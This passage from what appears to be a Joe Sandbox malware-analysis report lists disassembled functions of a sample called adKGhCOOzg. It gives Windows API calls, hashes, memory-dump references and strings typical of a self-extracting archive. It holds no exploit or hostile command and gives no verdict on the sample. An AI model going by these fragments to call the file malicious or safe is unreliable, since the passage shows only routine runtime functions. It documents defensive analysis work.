                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036B662
                                    • _free.LIBCMT ref: 0036B675
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036B684
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 65a8b33793e0e1bcdf3a3cb8437fea55ba078a2c438e07c1ad8501ba3a392fb8
                                    • Instruction ID: f2e4f1f778102517813be4bc9132e9baca8ab78136ba7c6cbc13c500a97e8008
                                    • Opcode Fuzzy Hash: 65a8b33793e0e1bcdf3a3cb8437fea55ba078a2c438e07c1ad8501ba3a392fb8
                                    • Instruction Fuzzy Hash: 0A01A772601215BFA3331676AC8CC7BAA6DDEC7BA03168239FD05C7119DF60CD8199B1
                                    Function 0035075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00350A41: ResetEvent.KERNEL32(?), ref: 00350A53
                                      • Part of subcall function 00350A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00350A67
                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0035078F
                                    • CloseHandle.KERNEL32(?,?), ref: 003507A9
                                    • DeleteCriticalSection.KERNEL32(?), ref: 003507C2
                                    • CloseHandle.KERNEL32(?), ref: 003507CE
                                    • CloseHandle.KERNEL32(?), ref: 003507DA
                                      • Part of subcall function 0035084E: WaitForSingleObject.KERNEL32(?,000000FF,00350A78,?), ref: 00350854
                                      • Part of subcall function 0035084E: GetLastError.KERNEL32(?), ref: 00350860
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                    • String ID:
                                    • API String ID: 1868215902-0
                                    • Opcode ID: 7cd81a4ab8fadf40ec9b6651dc569c7816e3e2d58372c4ff5e59ee0fd6833363
                                    • Instruction ID: c9e6e10a563422ac1ad236a32e7f4941d91212d1b5e6aad11e416cce35fcaf5b
                                    • Opcode Fuzzy Hash: 7cd81a4ab8fadf40ec9b6651dc569c7816e3e2d58372c4ff5e59ee0fd6833363
                                    • Instruction Fuzzy Hash: 30018072440704EBC7339B69DC84F86BBADFB49711F004519F55F52160CB766A889B91
                                    Function 0036BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0036BF28
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036BF3A
                                    • _free.LIBCMT ref: 0036BF4C
                                    • _free.LIBCMT ref: 0036BF5E
                                    • _free.LIBCMT ref: 0036BF70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: c15969acfadbf6843d454f5780fef0aed2c3a1ed576deb6c7e675b7e6188c086
                                    • Instruction ID: efab75f32a9e665434343c3d44a3a629b646d26b206052bb3f5d6971eb96c47b
                                    • Opcode Fuzzy Hash: c15969acfadbf6843d454f5780fef0aed2c3a1ed576deb6c7e675b7e6188c086
                                    • Instruction Fuzzy Hash: 35F0EC32508201ABC633EB65EECAC16F3DDBA08714B66C945F048DB929CF20FCC08E64
                                    Function 00347574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347579
                                      • Part of subcall function 00343B3D: __EH_prolog.LIBCMT ref: 00343B42
                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00347640
                                      • Part of subcall function 00347BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347C04
                                      • Part of subcall function 00347BF5: GetLastError.KERNEL32 ref: 00347C4A
                                      • Part of subcall function 00347BF5: CloseHandle.KERNEL32(?), ref: 00347C59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                    • API String ID: 3813983858-639343689
                                    • Opcode ID: ff42bb7302c725605e596dd06b1708eb065ff73caa72e331550b88a3929afb87
                                    • Instruction ID: 7b64c89510b100cda96e031645d65c6770b9315eec0d026f002d552c684014f4
                                    • Opcode Fuzzy Hash: ff42bb7302c725605e596dd06b1708eb065ff73caa72e331550b88a3929afb87
                                    • Instruction Fuzzy Hash: 0F31D571908248AEDF23EB68DC01FEE7BF9AF15344F014095F849AF152C7746A48C7A1
                                    Function 0035A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035A4B8
                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0035A4CD
                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0035A4E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: ASKNEXTVOL
                                    • API String ID: 445417207-3402441367
                                    • Opcode ID: a3b3496c20b191cd40ceb322549a9fbef4110713b5d3a64ac96483e7513f87ec
                                    • Instruction ID: b47ac4450bfbb6840668ab9b2228e2c40202b7830ba2e3b00272b943d1eb7c37
                                    • Opcode Fuzzy Hash: a3b3496c20b191cd40ceb322549a9fbef4110713b5d3a64ac96483e7513f87ec
                                    • Instruction Fuzzy Hash: 8C119672244600BFD6239F999C49F667BADEB4B702F114204FA419F2B0C7A19909E723
                                    Function 0034D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: __fprintf_l_strncpy
                                    • String ID: $%s$@%s
                                    • API String ID: 1857242416-834177443
                                    • Opcode ID: 0ff009b5f87fc8551d69c50605b5cb0faed024f02c8ad0577a59e69e690d9520
                                    • Instruction ID: 7f4427d33762c9eaed572e33d7f80cc61c0be70c2e0db6d8d6fc57964e6f1dca
                                    • Opcode Fuzzy Hash: 0ff009b5f87fc8551d69c50605b5cb0faed024f02c8ad0577a59e69e690d9520
                                    • Instruction Fuzzy Hash: 2C215172540208ABDB22DEA4CC46FDE7BECAF05300F044922FE159E1A5E3B5FA59DB51
                                    Function 0034B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • _swprintf.LIBCMT ref: 0034B51E
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • _wcschr.LIBVCRUNTIME ref: 0034B53C
                                    • _wcschr.LIBVCRUNTIME ref: 0034B54C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                    • String ID: %c:\
                                    • API String ID: 525462905-3142399695
                                    • Opcode ID: d237e95e883ac9ee6fb5ae8e8c5081602aeee8732f51eb2f90f66ed2b7ced14f
                                    • Instruction ID: 420c629903c26f85f203b2039557eaf4df8df4b325f884c2db7f866551e78689
                                    • Opcode Fuzzy Hash: d237e95e883ac9ee6fb5ae8e8c5081602aeee8732f51eb2f90f66ed2b7ced14f
                                    • Instruction Fuzzy Hash: 0601D653904311BBC6326B759C82D6BF7ECDE97360B558816F945CE481EB30E950C2A2
                                    Function 003506BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 003506F3
                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 003506FD
                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 0035070D
                                    Strings
                                    • Thread pool initialization failed., xrefs: 00350725
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                    • String ID: Thread pool initialization failed.
                                    • API String ID: 3340455307-2182114853
                                    • Opcode ID: 6dfa65cfc0acbb90210bee2a9418682f88c0328f1c33430ba0222f5bf135078d
                                    • Instruction ID: a3b530c5db0b36f4082cf448e92ef349de5d4e00291b73d3438bab493096b737
                                    • Opcode Fuzzy Hash: 6dfa65cfc0acbb90210bee2a9418682f88c0328f1c33430ba0222f5bf135078d
                                    • Instruction Fuzzy Hash: 4811A0B1500709AFC3325F66C884AA7FBECEB99745F11482EF1DA87210D6726984CB50
                                    Function 0035D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                    • API String ID: 0-56093855
                                    • Opcode ID: f29ed9c7d74b2a7b7644333102a597aaaeca194c065bc996085881902c2f9572
                                    • Instruction ID: 67ebbd67a8c0b0a8ac26917da6b367bd2298da5bc1c0e90eefc7099b67e4f5e0
                                    • Opcode Fuzzy Hash: f29ed9c7d74b2a7b7644333102a597aaaeca194c065bc996085881902c2f9572
                                    • Instruction Fuzzy Hash: C301D476600345AFDB238F5AEC04E567BADE708386F004461FC05D3230CB71AC54EBA1
                                    Function 003691DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                    • Instruction ID: c0c1ca42811a2df4520147bdcc097229aa6d66f3721f0a2fdd4a638a536d7b3f
                                    • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                    • Instruction Fuzzy Hash: 36A16775A003869FDB23CF69C8917AEBBEDEF15310F2585AFE8859B385C6348942C750
                                    Function 0034A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003480B7,?,?,?), ref: 0034A351
                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003480B7,?,?), ref: 0034A395
                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003480B7,?,?,?,?,?,?,?,?), ref: 0034A416
                                    • CloseHandle.KERNEL32(?,?,00000000,?,003480B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0034A41D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$Create$CloseHandleTime
                                    • String ID:
                                    • API String ID: 2287278272-0
                                    • Opcode ID: eae743d323d8c117bd0e8775a936c003f3f74f9a6a0854701574161748f201e4
                                    • Instruction ID: 70684e04421e329ad8fd6097f3a64791e869f5c4836eb6237ad3e2616b1ba927
                                    • Opcode Fuzzy Hash: eae743d323d8c117bd0e8775a936c003f3f74f9a6a0854701574161748f201e4
                                    • Instruction Fuzzy Hash: 8A41E0712887806AD732DF24CC45FEFBBE8AB85700F04091CB5D1DB291D664EA48EB53
                                    Function 0036C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003689AD,?,00000000,?,00000001,?,?,00000001,003689AD,?), ref: 0036C0E6
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036C16F
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003667E2,?), ref: 0036C181
                                    • __freea.LIBCMT ref: 0036C18A
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: 78494c8f5aa9866a185891e1788fb21aeb37844f1756ed0ef75fee37643087b6
                                    • Instruction ID: 324c7a7f226050c87fda9fa9b68d3e39f6d3fcffaa2fc6249955e567becf6a2e
                                    • Opcode Fuzzy Hash: 78494c8f5aa9866a185891e1788fb21aeb37844f1756ed0ef75fee37643087b6
                                    • Instruction Fuzzy Hash: 4D31EF72A1021AABDF269F64CC41DFE7BA9EB45710F058128FC09DB255EB35CD50CBA0
                                    Function 00359DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00359DBE
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00359DCD
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00359DDB
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00359DE9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 3e00cebbb629f105bc5c9ec85f3842004ea215aaefb3d7b629d878bcc71c8c40
                                    • Instruction ID: 48b433d69f081b557e01f6f1d2bc50707dee3f6b776cfdf68362a6c6ef5964cf
                                    • Opcode Fuzzy Hash: 3e00cebbb629f105bc5c9ec85f3842004ea215aaefb3d7b629d878bcc71c8c40
                                    • Instruction Fuzzy Hash: F3E0EC72985721ABD3225BB9AC0DB8B3B6CAB0A713F054045FA05961A0DB704405CB90
                                    Function 00362016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00362016
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0036201B
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00362020
                                      • Part of subcall function 0036310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0036311F
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00362035
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                    • Instruction ID: 462851ec604282b03f19a2220c237adb1168537d048af11cacee452f7042dd2d
                                    • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                    • Instruction Fuzzy Hash: 84C00224109A41D41C133BB221021AA07041863784B93E0C2A8801F68FDE06460A9036
                                    Function 00359F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00359DF1: GetDC.USER32(00000000), ref: 00359DF5
                                      • Part of subcall function 00359DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00359E00
                                      • Part of subcall function 00359DF1: ReleaseDC.USER32(00000000,00000000), ref: 00359E0B
                                    • GetObjectW.GDI32(?,00000018,?), ref: 00359F8D
                                      • Part of subcall function 0035A1E5: GetDC.USER32(00000000), ref: 0035A1EE
                                      • Part of subcall function 0035A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0035A21D
                                      • Part of subcall function 0035A1E5: ReleaseDC.USER32(00000000,?), ref: 0035A2B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
